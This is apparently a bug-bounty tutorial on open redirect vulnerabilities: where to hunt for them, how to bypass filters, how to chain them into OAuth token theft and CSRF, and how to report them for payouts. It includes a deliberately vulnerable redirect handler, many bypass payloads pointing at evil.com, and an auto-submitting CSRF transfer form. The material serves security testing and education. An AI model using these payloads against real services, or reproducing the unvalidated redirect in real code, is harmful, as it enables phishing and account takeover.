Why Open Redirects Still Matter

ToxSec | Bug bounty for open redirects.

Aug 16, 2024

ToxSec Open Redirect - Hacker Illustration

0x00 Introduction — Why Open Redirects Still Matter

Open redirects sit in a strange place in bug bounty. On paper they look trivial: a parameter that lets you bounce users to another domain. Many programs dismiss them as informational or low impact.

But hackers know the nuance. An open redirect buried in OAuth, SSO, or payment flows isn’t just a nuisance — it’s a stepping stone. With the right chain, that “low impact” bug becomes a path to token theft, session hijacking, or authentication bypass.

That’s why open redirects are still worth hunting. Not because they win bounties on their own, but because they fit neatly into larger attack stories. The difference between noise and payout is how well you demonstrate the impact.

0x01 How Open Redirects Work

At its core, an open redirect happens when an application lets the user decide where to send the browser next. Instead of validating the destination, the server just passes it along.

Simple Example

@app.route('/redirect')
def redirect():
    destination = request.args.get('next')
    return redirect(destination)

Intended use:

/redirect?next=/dashboard

→ User lands on the real dashboard.
Exploitation:

/redirect?next=https://evil.com

→ User lands on an attacker-controlled site.

0x02 Hunting Methodology

Open redirects are hard to find where they matter. The key is knowing which parameters are worth testing and which flows can escalate into impact.

Parameters to Watch

Applications use dozens of variations for redirection:
redirect, redirect_uri, return, returnTo, next, goto, continue, dest, url, target.

If it looks like it handles navigation, test it.

High-Value Hunting Grounds

Login/Logout flows

/login?next=/dashboard
/logout?return_to=https://target.com

Error handlers

/auth/error?return=https://target.com/login
/login/failed?redirect_to=https://target.com/retry

OAuth/SSO

/oauth/authorize?redirect_uri=[payload]
/saml/assertion?RelayState=[payload]

Payment flows

/checkout/callback?redirect=[payload]
/transaction/status?return_to=[payload]

Approach

During recon, map parameters carefully by grepping for keywords in JavaScript, API calls, and URL patterns. Once you’ve identified likely targets, test how they handle validation by supplying external domains. If basic checks are in place, probe for common bypasses such as using crafted inputs like target.com.evil.com or target.com@evil.com to slip past naïve filters.

Redirects are part of modern web plumbing. That ubiquity is why even “simple” bugs can carry weight when chained into sensitive flows. Redirects tied to authentication, tokens, or payments are where the payouts live.

0x03 Advanced Detection and Bypasses

Most developers know open redirects are risky, so they slap on filters. But those filters are usually just string checks or brittle regex. With the right payload, you can slip past them.

Common Validation Patterns

def is_valid_redirect(url):
    return url.startswith("https://target.com")

Bypass attempts:

https://target.com.evil.com
https://target.com@evil.com
https://target.com%2F%2F@evil.com
https://evil.com#target.com

The app sees target.com, but the browser parses evil.com.

Encoding Tricks

Single encode: https%3A%2F%2Fevil.com
Double encode: https%253A%252F%252Fevil.com
Mixed: https%3A%252F%252Fevil.com
Unicode: 
    https://ℯvil.com, 
    https://evil。com

Alternate Protocols

If the app doesn’t strictly enforce http/https:

javascript:window.location='https://evil.com'

data:text/html,<script>location='https://evil.com'</script>

ftp://evil.com

//evil.com (protocol-relative)

Real-World Example

One OAuth flow validated with url.startswith('https://target.com'). The payload:

https://target.com%2F%2F@evil.com

The server saw target.com. The browser redirected to evil.com. Result: OAuth code exfiltration and a bounty.

The lesson: filters aren’t logic — they’re string handling. Change the syntax, and most defenses fall apart.

0x04 Chaining for Impact

On its own, an open redirect might earn you a polite “informational” tag. But chained with the right flow, it can escalate into something triagers can’t ignore.

OAuth Token Theft

Open redirects in OAuth flows can hijack the callback.

/oauth/authorize?client_id=123&redirect_uri=https://evil.com/callback

Attacker’s domain gets the authorization code → exchange for an access token → full account takeover.

CSRF + Open Redirect

Pair a CSRF payload with a redirect parameter to bypass user suspicion:

<form action="https://target.com/api/transfer" method="POST">
  <input type="hidden" name="amount" value="1000">
  <input type="hidden" name="to" value="attacker">
  <input type="hidden" name="redirect_uri" value="https://evil.com/logger">
</form>
<script>document.forms[0].submit()</script>

The user action succeeds, then silently redirects to attacker-controlled logging.

Authentication Bypass

Redirects in login flows can be weaponized to pivot into restricted areas.

/login?redirect_to=https://target.com/admin%2f@evil.com

The app thinks it’s sending the user to /admin, but the browser lands on evil.com. Chained with weak session handling, this can bypass intended controls.

Enhanced Phishing

Even without tokens, a redirect off a trusted domain strengthens phishing campaigns. Users see auth.target.com in their address bar, click through, and land on an attacker site. It’s not just theory — companies continue paying for these scenarios.

0x05 Reporting Open Redirects for Payouts

Most open redirect reports die in triage. They get labeled “low impact” or “informational.” To move past that, your report has to tell a story — not just prove a redirect exists.

Frame the Impact

Don’t stop at “I can redirect to evil.com.”
Show how it compromises authentication flows, leaks tokens, or strengthens phishing.
Example headline:
- Weak: “Open redirect in login page.”
- Strong: “Open redirect in OAuth flow → account takeover via stolen token.”

Evidence to Include

Vulnerable endpoint with your payload URL.
Screenshots showing the redirect chain.
Annotated requests proving the parameter can be controlled.
Clean PoC (one crafted URL is enough).

Anticipate Pushback

“It requires user interaction.” → Show how phishing campaigns abuse it.
“It only redirects, no sensitive data.” → Demonstrate OAuth or SSO chaining.
“Out of scope.” → Reference how the redirect affects in-scope assets like login or payment flows.

Presentation Matters

Triagers review hundreds of reports. A clean structure and business-focused framing push yours to the top. Redirects that look boring in isolation become payout-worthy when you prove their role in real attack scenarios.

0x06 Debrief

Open redirects aren’t the flashiest vulnerability. On their own, they rarely earn more than a shrug. But in the right place, inside OAuth, SSO, or payment flows, they become the pivot point for high-impact exploits.

That’s the real lesson: value comes from chaining. A redirect by itself is noise; a redirect that steals tokens or bypasses controls is signal. For hunters, the job is twofold: spot the redirect parameters, then connect them to business risk. For programs, that’s the difference between an informational and a payout.

Open redirects will never disappear from the web stack. As long as developers keep wiring redirect parameters into auth and transaction flows, hunters who know how to frame and chain them will keep cashing in.